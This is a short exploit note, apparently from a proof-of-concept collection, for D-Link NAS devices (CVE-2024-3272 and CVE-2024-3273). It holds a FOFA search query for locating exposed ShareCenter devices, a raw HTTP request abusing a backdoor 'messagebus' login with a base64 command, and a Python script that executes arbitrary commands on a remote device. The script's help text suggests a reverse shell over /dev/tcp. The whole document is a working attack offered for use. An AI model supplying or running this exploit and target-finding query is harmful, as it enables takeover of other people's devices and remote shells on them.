D-Link-NAS(CVE-2024-3272&&CVE-2024-3273)
fofa
body="Text:In order to access the ShareCenter"
poc
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
脚本
# Author: Nick Swink (c0rnbread)
# Original post: https://github.com/netsecfish/dlink
# CVE-2024-3272 + CVE-2024-3273
#
# Description: Backdoor Authentication Bypass + Command Injection
# Affected Devices:
# DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
# DNS-325 Version 1.01
# DNS-327L Version 1.09, Version 1.00.0409.2013
# DNS-340L Version 1.08
import requests, argparse, base64
def main(url, command):
base64_command = base64.b64encode(command.encode('utf-8'))
base64_command = base64_command.decode('utf-8')
uri = f"/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={base64_command}"
print("Sending exploit request to endpoint...")
print(url + uri)
r = requests.get(url + uri)
if r.status_code == 200:
print("Status code: 200")
print("Exploit appeared to succeed!")
print(f"\n\tPrinting output: {base64.b64decode(r.text).decode('utf-8')}")
else:
print("Status NOT 200")
print("Exploit Failed. Exiting...")
exit()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Execute arbitrary command on remote system.")
parser.add_argument("url", help="Base URL of the D-Link web interface. e.g., http://example.com")
parser.add_argument("command", help="Command to be executed. e.g., /bin/sh -i >& /dev/tcp/localhost/9999 0>&1")
args = parser.parse_args()
main(args.url, args.command)
